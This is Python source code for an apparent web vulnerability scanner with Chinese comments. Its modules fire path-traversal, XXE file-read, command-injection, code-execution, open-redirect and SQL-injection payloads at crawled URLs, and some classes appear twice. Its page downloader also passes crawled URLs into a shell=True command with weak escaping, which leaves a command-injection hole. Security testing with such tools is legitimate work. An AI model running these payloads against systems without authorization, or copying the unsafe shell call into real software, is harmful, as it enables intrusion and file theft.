r'.*root:[^\n]*:/bin/sh.*', r'.*\[extensions\].*', r'.*root:[^\n]*:/bin/sh.*', r'.*\[extensions\].*'] self.results = [re.compile(rgx, re.DOTALL | re.IGNORECASE) for rgx in results] def engine_start(self): """ 主函数,从kb中取数据并进行测试 """ self.log(['Engine started.'], DEBUG) url_count = 0 while True: # 读取数据,读取完全返回None results = self.kb.read_data(URL, LFI_SCANNER, url_count) if results is None: break # 添加到任务列表,只取2-POST和1-带参数的GET if len(results) > 0: url_count += len(results) self.task_queue.extend([result for result in results if (result[1] == 1 or result[1] == 2)]) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待线程关闭 self.dispather.suicide() self.log(['Engine stopped.'], DEBUG) def check_on_lfi(self, task, thread_no): """ 线程执行函数,检测单个URL上的LFI漏洞 :task: (url, is_post, code, depth)的元组 :thread_no: 当前线程号 """ url, query = extract_path_query(task[0]) is_post = task[1] # 对payload中的所有payload挨个检查,一个成功则退出 for payload in self.payloads: # 检测到退出标志置位,退出 if self.exit_flag: self.log(['Thread killed, abort on %s' % task[0]], DEBUG) break # 发送payload,检查参数位置 index = send_payload(url, is_post, query, payload, self.analyze_lfi_result, self.cookie) if index == -1: continue # 打印,并保存payload self.log(['[VULNERABLE] ' + task[0], ' [LOCATION] ' + query[index][0], ' [PAYLOAD] ' + payload], not DEBUG) self.kb.save_data(LFI, (task[0], query[index][0], payload, 'LFI')) break else: self.log(['[INVULNERABLE] ' + task[0]], DEBUG) def analyze_lfi_result(self, payload, src, _): """ 检查结果中是否有payload,找到对应的返回结果的正则,匹配一下看看 """ for i in xrange(len(self.bodys)): if self.bodys[i] in payload: if self.results[i].match(src): return True return False return False def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs, debug): if debug: self.logger.debug(self.owner, msgs) else: self.logger.info(self.owner, msgs)
class ReflectedXss(object): """ 反射型或者存储型XSS的检测,payload直接echo在返回的页面中 """ def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 线程数 :cookie: cookie """ super(ReflectedXss, self).__init__() self.kb = kb self.logger = logger self.cookie = cookie self.owner = 'ReflectedXss' self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False # 替换后的payload们 self.payloads = [replace_randomize(i) for i in PAYLOADS] # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_reflected_xss, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2 ) def engine_start(self): """ 反射型Xss扫描器主函数,从kb中取数据并进行测试 """ url_count = 0 while True: # 读取数据,读取完全返回None results = self.kb.read_data(URL, XSS_SCANNER, url_count) if results is None: break # 添加到任务列表,只取2-POST和1-带参数的GET if len(results) > 0: url_count += len(results) self.task_queue.extend([result for result in results if (result[1] == 1 or result[1] == 2)]) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待线程关闭 self.dispather.suicide() def check_on_reflected_xss(self, task, thread_no): """ 线程执行函数,检测单个URL上的XSS漏洞 :task: (url, is_post, code, depth)的元组 :thread_no: 当前线程号 """ url, query = extract_path_query(task[0]) is_post = task[1] # 对payload中的所有payload挨个检查,一个成功则退出 for payload in self.payloads: # 检测到退出标志置位,退出 if self.exit_flag: self.log(['Thread killed, abort on %s' % task[0]], DEBUG) break # 发送payload,检查参数位置 index = send_payload(url, is_post, query, payload, self.analyze_reflected_result, self.cookie) if index == -1: continue # 打印,并保存payload self.log(['[VULNERABLE] ' + task[0], '[LOCATION] ' + query[index][0], '[PAYLOAD] ' + payload], not DEBUG) self.kb.save_data(XSS, (task[0], query[index][0], payload, 'XSS')) break else: self.log(['[INVULNERABLE] ' + task[0]], DEBUG) def analyze_reflected_result(self, payload, src, _): """ 检查结果中是否有payload,现在是检查payload原文是否在返回来的源代码中 """ return payload in src def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs, debug): if debug: self.logger.debug(self.owner, msgs) else: self.logger.info(self.owner, msgs)
class INFOLeakage(object): """ 信息泄露扫描器,扫描数据库中的结果并保存到数据库中 """ def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(INFOLeakage, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'INFOLeakage' # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_INFO_LEAKAGE, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2 ) self.payloads = pathlist def engine_start(self): """ 主函数,从kb中取数据并进行测试 """ self.log(['Engine started.'], DEBUG) url_count = 0 while True: # 读取数据,读取完全返回None results = self.kb.read_data(URL, INFO_Leakage, url_count) if results is None: break # 添加到任务列表,只取2-POST和1-带参数的GET if len(results) > 0: url_count += len(results) self.task_queue.extend([result for result in results if (result[1] == 1 or result[1] == 2)]) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待线程关闭 self.dispather.suicide() self.log(['Engine stopped.'], DEBUG) def check_on_INFO_LEAKAGE(self, task, thread_no): """ 线程执行函数,检测单个URL上的信息泄露 :task: (url, is_post, code, depth)的元组 :thread_no: 当前线程号 """ url, query = extract_path_query(task[0]) is_post = task[1] # 对payload中的所有payload挨个检查,一个成功则退出 for payload in self.payloads.keys(): # 检测到退出标志置位,退出 if self.exit_flag: self.log(['Thread killed, abort on %s' % task[0]], DEBUG) break # 发送payload,检查参数位置 index = send_payload(url, is_post, query, payload, self.analyze_INFO_result, self.cookie) if index == -1: continue # 打印,并保存payload self.log(['[VULNERABLE] ' + task[0], ' [LOCATION] ' + query[index][0], ' [PAYLOAD] ' + payload], not DEBUG) self.kb.save_data(INFO, (task[0], query[index][0], payload, 'INFO')) break else: self.log(['[INVULNERABLE] ' + task[0]], DEBUG) def analyze_INFO_result(self, payload, src, ori_time): """ 检查结果中是否有payload,找到对应的返回结果的正则,匹配一下看看 """ return self.payloads[payload] in src def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs, debug): if debug: self.logger.debug(self.owner, msgs) else: self.logger.info(self.owner, msgs)
class LFIScanner(object): """ LFI扫描器,扫描数据库中的结果并保存到数据库中 """ def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(LFIScanner, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'LFIScanner' # 线程分发器 self.dispather = ParallelDispatcher(thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_lfi, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2) heads = ['../' * 16] self.bodys = ['etc/passwd', 'windows/win.ini'] tails = ['', '\0', '%00', '?', '/' + './' * 2048] self.payloads = [ ''.join([a, b, c]) for a in heads for b in self.bodys for c in tails ] # 新加了两个xxe的payload,检测与之前一致 temp = [ '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>', '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/windows/win.ini>]><foo>&xxe;</foo>' ] self.payloads.extend(temp) self.bodys.extend(temp) # 每一个body对应一个result,正则编译的结果 results = [ r'.*root:[^\n]*:/bin/sh.*', r'.*\[extensions\].*', r'.*root:[^\n]*:/bin/sh.*', r'.*\[extensions\].*' ] self.results = [ re.compile(rgx, re.DOTALL | re.IGNORECASE) for rgx in results ] def engine_start(self): """ 主函数,从kb中取数据并进行测试 """ self.log(['Engine started.'], DEBUG) url_count = 0 while True: # 读取数据,读取完全返回None results = self.kb.read_data(URL, LFI_SCANNER, url_count) if results is None: break # 添加到任务列表,只取2-POST和1-带参数的GET if len(results) > 0: url_count += len(results) self.task_queue.extend([ result for result in results if (result[1] == 1 or result[1] == 2) ]) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待线程关闭 self.dispather.suicide() self.log(['Engine stopped.'], DEBUG) def check_on_lfi(self, task, thread_no): """ 线程执行函数,检测单个URL上的LFI漏洞 :task: (url, is_post, code, depth)的元组 :thread_no: 当前线程号 """ url, query = extract_path_query(task[0]) is_post = task[1] # 对payload中的所有payload挨个检查,一个成功则退出 for payload in self.payloads: # 检测到退出标志置位,退出 if self.exit_flag: self.log(['Thread killed, abort on %s' % task[0]], DEBUG) break # 发送payload,检查参数位置 index = send_payload(url, is_post, query, payload, self.analyze_lfi_result, self.cookie) if index == -1: continue # 打印,并保存payload self.log([ '[VULNERABLE] ' + task[0], ' [LOCATION] ' + query[index][0], ' [PAYLOAD] ' + payload ], not DEBUG) self.kb.save_data(LFI, (task[0], query[index][0], payload, 'LFI')) break else: self.log(['[INVULNERABLE] ' + task[0]], DEBUG) def analyze_lfi_result(self, payload, src, _): """ 检查结果中是否有payload,找到对应的返回结果的正则,匹配一下看看 """ for i in xrange(len(self.bodys)): if self.bodys[i] in payload: if self.results[i].match(src): return True return False return False def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs, debug): if debug: self.logger.debug(self.owner, msgs) else: self.logger.info(self.owner, msgs)
class CODEExec(object): """ 代码执行扫描器,扫描数据库中的结果并保存到数据库中 """ def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(CODEExec, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'CODEExec' # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_CODE_exec, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2 ) PRINT_REPEATS = 5 PRINT_STRINGS = ( # PHP http://php.net/eval "echo str_repeat('%%s',%s);" % PRINT_REPEATS, # Perl http://perldoc.perl.org/functions/eval.html "print '%%s'x%s" % PRINT_REPEATS, # Python # http://docs.python.org/reference/simple_stmts.html#the-exec-statement "print '%%s'*%s" % PRINT_REPEATS, # ASP "Response.Write(new String(\"%%s\",%s))" % PRINT_REPEATS, ) self.payloads = PRINT_STRINGS def engine_start(self): """ 主函数,从kb中取数据并进行测试 """ self.log(['Engine started.'], DEBUG) url_count = 0 while True: # 读取数据,读取完全返回None results = self.kb.read_data(URL, CODE_EXEC, url_count) if results is None: break # 添加到任务列表,只取2-POST和1-带参数的GET if len(results) > 0: url_count += len(results) self.task_queue.extend([result for result in results if (result[1] == 1 or result[1] == 2)]) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待线程关闭 self.dispather.suicide() self.log(['Engine stopped.'], DEBUG) def check_on_CODE_exec(self, task, thread_no): """ 线程执行函数,检测单个URL上的代码执行漏洞 :task: (url, is_post, code, depth)的元组 :thread_no: 当前线程号 """ url, query = extract_path_query(task[0]) is_post = task[1] # 对payload中的所有payload挨个检查,一个成功则退出 for payload in self.payloads: # 检测到退出标志置位,退出 if self.exit_flag: self.log(['Thread killed, abort on %s' % task[0]], DEBUG) break # 发送payload,检查参数位置 index = send_payload(url, is_post, query, payload, self.analyze_CODE_result, self.cookie) if index == -1: continue # 打印,并保存payload self.log(['[VULNERABLE] ' + task[0], ' [LOCATION] ' + query[index][0], ' [PAYLOAD] ' + payload], not DEBUG) self.kb.save_data(CODE, (task[0], query[index][0], payload, 'CODE')) break else: self.log(['[INVULNERABLE] ' + task[0]], DEBUG) def analyze_CODE_result(self, payload, src, ori_time): """ 检查结果中是否有payload,找到对应的返回结果的正则,匹配一下看看 """ return '%s' * 5 in src def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs, debug): if debug: self.logger.debug(self.owner, msgs) else: self.logger.info(self.owner, msgs)
class UrlRedirect(object): """ URL跳转的检测,通过是否跳转到指定页面判断 """ def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 线程数 :cookie: cookie """ super(UrlRedirect, self).__init__() self.kb = kb self.logger = logger self.cookie = cookie self.owner = 'UrlRedirect' self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False test_urls = ['http://www.baidu.com/', '//baidu.com'] self.payloads = test_urls # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_url_redirect, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2) def engine_start(self): """ URL跳转扫描器主函数,从kb中取数据并进行测试 """ self.log(['Engine started.'], DEBUG) url_count = 0 while True: # 读取数据,读取完全返回None results = self.kb.read_data(URL, URL_REDIRECT, url_count) if results is None: break # 添加到任务列表,只取2-POST和1-带参数的GET if len(results) > 0: url_count += len(results) self.task_queue.extend([ result for result in results if (result[1] == 1 or result[1] == 2) ]) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待线程关闭 self.dispather.suicide() self.log(['Engine stopped.'], DEBUG) def check_on_url_redirect(self, task, thread_no): """ 线程执行函数,检测单个URL上的URL跳转漏洞 :task: (url, is_post, code, depth)的元组 :thread_no: 当前线程号 """ url, query = extract_path_query(task[0]) is_post = task[1] # 对payload中的所有payload挨个检查,一个成功则退出 for payload in self.payloads: # 检测到退出标志置位,退出 if self.exit_flag: self.log(['Thread killed, abort on %s' % task[0]], DEBUG) break # 发送payload,检查参数位置 index = send_payload(url, is_post, query, payload, self.analyze_urlredirect_result, self.cookie) if index == -1: continue # 打印,并保存payload self.log([ '[VULNERABLE] ' + task[0], '[LOCATION] ' + query[index][0], '[PAYLOAD] ' + payload ], not DEBUG) self.kb.save_data( URL_REDIRECT, (task[0], query[index][0], payload, 'URL_REDIRECT')) break else: self.log(['[INVULNERABLE] ' + task[0]], DEBUG) def analyze_urlredirect_result(self, payload, src, _): """ 检测是否跳转到指定页面(百度) """ # print payload if u'<title>百度一下,你就知道</title>' in src or u'跳转中' in src: return 1 return 0 def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs, debug): if debug: self.logger.debug(self.owner, msgs) else: self.logger.info(self.owner, msgs)
class UrlRedirect(object): """ URL跳转的检测,通过是否跳转到指定页面判断 """ def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 线程数 :cookie: cookie """ super(UrlRedirect, self).__init__() self.kb = kb self.logger = logger self.cookie = cookie self.owner = 'UrlRedirect' self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False test_urls = [ 'http://www.baidu.com/', '//baidu.com' ] self.payloads = test_urls # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_url_redirect, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2 ) def engine_start(self): """ URL跳转扫描器主函数,从kb中取数据并进行测试 """ self.log(['Engine started.'], DEBUG) url_count = 0 while True: # 读取数据,读取完全返回None results = self.kb.read_data(URL, URL_REDIRECT, url_count) if results is None: break # 添加到任务列表,只取2-POST和1-带参数的GET if len(results) > 0: url_count += len(results) self.task_queue.extend([result for result in results if (result[1] == 1 or result[1] == 2)]) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待线程关闭 self.dispather.suicide() self.log(['Engine stopped.'], DEBUG) def check_on_url_redirect(self, task, thread_no): """ 线程执行函数,检测单个URL上的URL跳转漏洞 :task: (url, is_post, code, depth)的元组 :thread_no: 当前线程号 """ url, query = extract_path_query(task[0]) is_post = task[1] # 对payload中的所有payload挨个检查,一个成功则退出 for payload in self.payloads: # 检测到退出标志置位,退出 if self.exit_flag: self.log(['Thread killed, abort on %s' % task[0]], DEBUG) break # 发送payload,检查参数位置 index = send_payload(url, is_post, query, payload, self.analyze_urlredirect_result, self.cookie) if index == -1: continue # 打印,并保存payload self.log(['[VULNERABLE] ' + task[0], '[LOCATION] ' + query[index][0], '[PAYLOAD] ' + payload], not DEBUG) self.kb.save_data(URL_REDIRECT, (task[0], query[index][0], payload, 'URL_REDIRECT')) break else: self.log(['[INVULNERABLE] ' + task[0]], DEBUG) def analyze_urlredirect_result(self, payload, src, _): """ 检测是否跳转到指定页面(百度) """ # print payload if u'<title>百度一下,你就知道</title>' in src or u'跳转中' in src: return 1 return 0 def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs, debug): if debug: self.logger.debug(self.owner, msgs) else: self.logger.info(self.owner, msgs)
class CMDExec(object): """ 命令执行扫描器,扫描数据库中的结果并保存到数据库中 """ def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 扫描线程数 :cookie: cookie """ super(CMDExec, self).__init__() self.kb = kb self.cookie = cookie self.logger = logger self.task_queue = [] self.seconds_wait = 2 self.exit_flag = False self.owner = 'CMDExec' # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_cmd_exec, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2 ) heads = ['', ';', '|'] bodys = ['ping -c 20 127.0.0.1', 'ping -n 20 127.0.0.1', 'echo 123456789098765432345678'] self.results = ['123456789098765432345678'] self.payloads = [''.join([a, b]) for a in heads for b in bodys] def engine_start(self): """ 主函数,从kb中取数据并进行测试 """ self.log(['Engine started.'], DEBUG) url_count = 0 while True: # 读取数据,读取完全返回None results = self.kb.read_data(URL, CMD_EXEC, url_count) if results is None: break # 添加到任务列表,只取2-POST和1-带参数的GET if len(results) > 0: url_count += len(results) self.task_queue.extend([result for result in results if (result[1] == 1 or result[1] == 2)]) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待线程关闭 self.dispather.suicide() self.log(['Engine stopped.'], DEBUG) def check_on_cmd_exec(self, task, thread_no): """ 线程执行函数,检测单个URL上的命令执行漏洞 :task: (url, is_post, code, depth)的元组 :thread_no: 当前线程号 """ url, query = extract_path_query(task[0]) is_post = task[1] # 对payload中的所有payload挨个检查,一个成功则退出 for payload in self.payloads: # 检测到退出标志置位,退出 if self.exit_flag: self.log(['Thread killed, abort on %s' % task[0]], DEBUG) break # 发送payload,检查参数位置 index = send_payload(url, is_post, query, payload, self.analyze_cmd_result, self.cookie) if index == -1: continue # 打印,并保存payload self.log(['[VULNERABLE] ' + task[0], ' [LOCATION] ' + query[index][0], ' [PAYLOAD] ' + payload], not DEBUG) self.kb.save_data(CMD, (task[0], query[index][0], payload, 'CMD')) break else: self.log(['[INVULNERABLE] ' + task[0]], DEBUG) def analyze_cmd_result(self, payload, src, ori_time): """ 检查结果中是否有payload,找到对应的返回结果的正则,匹配一下看看 """ if 'echo' in payload: return self.results[0] in src and not ('echo ' + self.results[0]) in src #print time.time() - ori_time #通过延时来判读命令是否执行 return (time.time() - ori_time) > 19 def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs, debug): if debug: self.logger.debug(self.owner, msgs) else: self.logger.info(self.owner, msgs)
class SrcDownloader(object): """ 下载器模块,下载源代码,并且保存到kb """ def __init__(self, kb, phantomjs_path, evaljs_path, logger, thread_num, filetype_whitelist, depth_limit, temp_dir_path): """ :kb: Universal KnowledgeBase :phantomjs_path: phantomjs路径 :evaljs_path: js脚本路径 :logger: 输出 :thread_num: 最大线程数 :filetype_whitelist:文件类型白名单 :depth_limit: 爬行深度限制 :temp_dir_path: 临时文件夹 """ super(SrcDownloader, self).__init__() self.kb = kb self.logger = logger self.executable = ' '.join([phantomjs_path, evaljs_path, '']) self.filetype_whitelist = filetype_whitelist self.depth_limit = depth_limit self.temp_dir_path = temp_dir_path self.exit_flag = False self.task_queue = [] self.seconds_wait = 1 # 检测新加进来的URL # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.download_page, logger=self.logger, owner='Downloader', start_index=0, seconds_wait=2 ) def engine_start(self): """ 下载器主函数,下载源代码,并且保存到kb """ self.log(['Engine started.']) url_count = 0 while True: # 读取URL,读取完全返回None results = self.kb.read_data(URL, SRC_DOWNLOADER, url_count) if results is None: break # 添加到任务队列,由分发器分发 if len(results) > 0: url_count += len(results) self.task_queue.extend(results) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待线程结束 self.dispather.suicide() self.log(['Engine stopped.']) def download_page(self, task, thread_no): """ 线程执行函数,用phantomjs下载页面并且处理JS,结果保存到数据库 :task: (url, is_post,status_code, depth) :thread_no: 线程号 """ # 深度超过限制,文件类型不合法,或者是logout(这个也许有别的方法?) if (self.depth_limit < task[3] or not self.is_valid_filetype(task[0]) or re.compile(r'.*logout.*', re.IGNORECASE | re.DOTALL).search(task[0])): return self.log(['%d %s' % (task[3], task[0])]) # shell命令,phantomjs,在参数前面增加P/G代表POST或者GET # batcmd = self.executable + ('"P' if task[1] == 2 else '"G') + task[0].replace('"', # '""') + '" "' + os.getcwd() + '/EagleX/extra/temp"' batcmd = '{phantomjs}"{method}{url}" "{tmpdir}/EagleX/extra/temp"'.format(phantomjs=self.executable, method=('P' if task[1] == 2 else 'G'), url=task[0].replace('"', '""'), tmpdir=os.getcwd()) try: result = subprocess.check_output(batcmd, stderr=subprocess.STDOUT, shell=True, universal_newlines=True) # self.log([result]) except subprocess.CalledProcessError as exc: self.exc = exc self.log(['[ERROR] phantomjs crashed, stderr output saved to CRASH.txt']) format_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) f = open(self.temp_dir_path + 'CRASH.txt', 'a') msg = '''======================={time}======================== *********************************************************** {task} *********************************************************** =========================================================== '''.format(time=format_time, task=task[0]) f.write(msg) f.close() return # 数据库 self.kb.save_data(SRC, (task[0], result, task[3])) def is_valid_filetype(self, url): """ 检查文件后缀是否合法 :url: 目标URL :return: True or False """ extension = os.path.splitext(urlparse(url).path)[1].lstrip('.') # print extension if not extension: return True # 如果没有匹配到后缀放行 return self.filetype_whitelist.get(extension) is not None def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs): self.logger.debug('Downloader', msgs)
class SqlScanner(object): """ SQL注入扫描的主引擎 """ def __init__(self, kb, sqlmapapi_path, sqlmapapi_port, logger, cookie, sqlmapapi_addr, thread_num, temp_dir_path): """ :kb: Universal KnowledgeBase :sqlmapapi_path: 脚本的路径 :sqlmapapi_port: 监听的端口 :sqlmapapi_addr: 监听的地址,默认localhost :logger: 输出 :cookie: cookie,默认为空 :thread_num: 最大的线程数 :temp_dir_path: 临时文件夹 """ super(SqlScanner, self).__init__() self.kb = kb self.logger = logger self.cookie = cookie self.temp_dir_path = temp_dir_path self.task_queue = [] self.seconds_wait = 2 # 检测新加进来的URL self.sqlmapapi_process = None self.exit_flag = False self.sqlmapapi_server = ''.join( ['http://', sqlmapapi_addr, ':', str(sqlmapapi_port)]) # autosqli的对象列表 self.autosqli_list = [None for i in xrange(thread_num)] self.autosqli_list_mutex = threading.Lock() # 线程分发器 self.dispather = ParallelDispatcher( thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_sql_injection, logger=self.logger, owner='SqlScanner', start_index=0, seconds_wait=1) # 开启sqlmapapi服务 self.start_sqlmapapi_server(sqlmapapi_path, sqlmapapi_addr, sqlmapapi_port) def start_sqlmapapi_server(self, path, addr, port): """ 开启sqlmapapi服务,输出重定向到文件中 :path: 可执行路径 :addr: 服务器监听地址 :port: 服务器监听端口 """ self.f_out = open(self.temp_dir_path + 'sqlmapapi.stdout.temp', 'w') self.f_err = open(self.temp_dir_path + 'sqlmapapi.stderr.temp', 'w') # 更改脚本当前路径,防止sqlmapapi后续调用路径错误 # 不再修改路径,把sqlmap放到了根目录下面,然后修改了api.py self.sqlmapapi_process = subprocess.Popen( ['python', path, '-s', '-H', addr, '-p', str(port)], shell=False, stdout=self.f_out, stderr=self.f_err) self.log(['sqlmapapi server started at %s:%d.' % (addr, port)], DEBUG) def engine_start(self): """ Sql扫描器主函数,从kb中取数据并进行测试 """ self.log(['Engine started.'], DEBUG) url_count = 0 while True: # 读取URL数据,读取完全返回None results = self.kb.read_data(URL, SQL_SCANNER, url_count) if results is None: break # 添加到任务列表,只取2-POST和1-带参数的GET if len(results) > 0: url_count += len(results) self.task_queue.extend([ result for result in results if (result[1] >= 1) ]) # or result[1] == 2)]) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 清理现场,退出 self.clean_up_the_mess() self.log(['Engine stopped.'], DEBUG) def check_on_sql_injection(self, task, thread_no): """ 线程执行函数,检查单个URL的注入,结果保存到数据库 :task: (url, is_post, code, depth)的元组 :thread_no: 当前线程号,用于保存sqli """ url = task[0] para = '' # POST则分隔开参数 if task[1] == 2: url, para = url.split('?', 1) # 启动mAutoSqli调用sqlmapapi进行检测,添加到对象列表中 sqli = AutoSqli(server=self.sqlmapapi_server, target=url, logger=self.logger, timeout=120, data=para, referer='', cookie=self.cookie, other_options={}, retries=3) self.autosqli_list_mutex.acquire() self.autosqli_list[thread_no] = sqli self.autosqli_list_mutex.release() # 测完了要组装回去 url += '?' + para if len(para) > 0 else '' # 扫描结果处理 result = sqli.scan() if result is None: self.log(['[INVULNERABLE] ' + url], DEBUG) elif len(result) > 0: # 输出dbms和payload信息,保存到数据库 (dbms, payload) = self.get_info(result) self.log([ '[VULNERABLE] ' + url, '[DBMS] ' + dbms, '[PAYLOAD] ' + payload ], not DEBUG) self.kb.save_data(SQL, (url, dbms, payload)) def get_info(self, result): """ 从Json格式的数据中读取到dbms和payload :result: JSON数据 :return: (dbms, payload) """ payload = '' dbms = '' try: data = result[0]['value'][0]['data'] dbms = result[0]['value'][0]['dbms'] if dbms is None: dbms = '' if data is None: raise NameError('') # 多个payload,用\n连接成串 data_list = list(data) for x in data_list: try: payload += '' if data[x]['payload'] == None else ( data[x]['payload'] + '\n') except: pass if (len(payload) > 0): payload = payload[0:-1] # 删除最后的回车 except: pass return (dbms, payload) def clean_up_the_mess(self): """ 杀死AutoSqli对象,停止线程 """ # 杀死测试线程 self.autosqli_list_mutex.acquire() for x in self.autosqli_list: if x != None: x.exit() self.autosqli_list_mutex.release() # 等待线程结束 self.dispather.suicide() # 杀死sqlmapapi if self.sqlmapapi_process: try: self.sqlmapapi_process.kill() self.log(['sqlmapapi server stopped.'], DEBUG) self.f_out.close() self.f_err.close() except: pass def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs, debug): if debug: self.logger.debug('SqlScanner', msgs) else: self.logger.info('SqlScanner', msgs)
class DomXss(object): """ 检测DOM XSS,检查页面中可控字段,无需发送payload """ def __init__(self, kb, logger, thread_num, cookie): """ :kb: Universal KnowledgeBase :logger: 输出 :thread_num: 线程数 :cookie: cookie """ super(DomXss, self).__init__() self.kb = kb self.logger = logger self.cookie = cookie self.owner = 'DomXss' self.task_queue = [] self.visited = {} self.seconds_wait = 2 self.exit_flag = False # 线程分发器 self.dispather = ParallelDispatcher(thread_num=thread_num, data_source=self.task_queue, execute_func=self.check_on_dom_xss, logger=self.logger, owner=self.owner, start_index=0, seconds_wait=2) def engine_start(self): """ 检测DOM XSS主函数 """ url_count = 0 while True: # 读取数据,读取完全返回None results = self.kb.read_data(URL, XSS_SCANNER, url_count) if results is None: break # 所有的URL都添加到任务列表 if len(results) > 0: url_count += len(results) self.task_queue.extend(results) self.dispather.dispath_scan_task() # 检测到退出标志置位,退出 if self.exit_flag: break time.sleep(self.seconds_wait) # 等待线程关闭 self.dispather.suicide() def check_on_dom_xss(self, task, thread_no): """ 线程执行函数,检查可能的DOM输出点,包括其他包含的JS :task: (url, is_post, code, depth)的元组 :thread_no: 当前线程号 """ # 下载原页面,找到所有js src,访问并保存 src = {task[0]: send_common_request(task[0], task[1], self.cookie)} for js in _script_src_re.findall(src[task[0]]): # 检测到退出标志置位,退出 if self.exit_flag: self.log(['Thread killed, abort on %s' % task[0]], DEBUG) return # 访问js并且保存代码,重复不再爬取 # 这里有个问题是,如果是某个js中有输出点,那第一个被检查出来之后后面的就不管了 # 理论上不太可能是某个js中,就算是,至少也会爆出来一个。还算可以接受 link = url_process(js, task[0]) if self.visited.get(link) is not None: continue self.visited[link] = 0 src[js] = send_common_request(link, 0, '') # 检查所有的src中的输出点,存在则保存 for url in src.keys(): res = self.analyze_dom_result(src[url]) if res is not None: # 打印,并保存payload self.log([ '[VULNERABLE] ' + task[0], '[FILE] ' + url, '[KEYWORD] ' + res ], not DEBUG) self.kb.save_data(XSS, (task[0], url, res, 'DOM')) break else: self.log(['[INVULNERABLE] ' + task[0]], DEBUG) def analyze_dom_result(self, response): """ 检查源代码中是否有DOM的输出点 :response: 源代码 :return: 不存在则None,否则可控点的字符串 """ res = '' for function_re in JS_FUNCTION_CALLS: parameters = function_re.search(response) if parameters: for user_controlled in DOM_USER_CONTROLLED: if user_controlled in parameters.groups()[0]: res = '|'.join([res, user_controlled]) if len(res) > 0: return res[1:] else: return None def exit(self): self.dispather.exit() self.exit_flag = True def log(self, msgs, debug): if debug: self.logger.debug(self.owner, msgs) else: self.logger.info(self.owner, msgs)